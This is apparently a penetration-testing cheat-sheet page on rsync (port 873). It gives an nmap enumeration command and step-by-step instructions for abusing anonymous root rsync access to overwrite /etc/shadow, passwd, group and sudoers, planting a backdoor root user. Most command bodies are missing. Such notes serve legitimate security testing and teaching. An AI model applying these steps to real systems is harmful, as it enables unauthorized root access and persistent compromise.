873 - RSYNC
Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).
example of Rsyncd.conf file that allows anonymous root access to the entire file system:
enumeration
nmap -p 873 192.168.0.1
List directory
list directory ipv6
List sub directory contents
List directories and files recursively
Download files
Download folders
Upload files
Upload folders
Creating a New User through Rsync
If Rsync is configured to run as root and is anonymously accessible, itβs possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.
Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.
Creating the Home Directory Letβs start by creating our new userβs home directory.
Create the Shadow File Entry The /etc/shadow file is the Linux password file that contains user information such as home directories and encrypted passwords. It is only accessible by root.
To inject a new user entry via Rsync youβll have to:
Generate a password.
Create the line to inject.
Download /etc/shadow. (and backup)
Append the new user to the end of /etc/shadow
Upload / Overwrite the existing /etc/shadow
Note: Make sure to create a new user that doesnβt already exist on the system.
Create Encrypted Password:
Add New User Entry to /etc/shadow:
Create Passwd File Entry The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted password. It can be read by all users.
To inject a new user entry via Rsync youβll have to:
Create the user entry to inject.
Download /etc/passwd. (and back it up so you can restore state later)
Append the new user entry to the end of passwd.
Upload / Overwrite the existing /etc/passwd
Note: Feel free to change to uid, but make sure it matches the value set in the /etc/group file. In this case the UID/GUID are 1021.
Add New User Entry to /etc/passwd:
Create the Group File Entry The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted password. It can be read by all users.
To inject a new user entry via Rsync youβll have to:
Create the user entry to inject.
Download /etc/group. (and backup, just in case)
Append the new user entry to the end of group.
Upload / Overwrite the existing /etc/group file.
Note: Feel free to change to uid, but make sure it matches the value set in the /etc/passwd file. In this case the UID/GUID are 1021.
Add New User Entry to /etc/group:
Create Sudoers File Entry The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.
To inject a entry via Rsync youβll have to:
Create the user entry to inject.
Download /etc/sudoers. (and backup, just in case)
Append the new user entry to the end of sudoers.
Upload / Overwrite the existing /etc/sudoers file.
Add New User Entry to /etc/sudoers:
Now you can simply log into the server via SSH using your newly created user and sudo sh to root!
source:
https://blog.netspi.com/linux-hacking-case-studies-part-1-rsync/
Last updated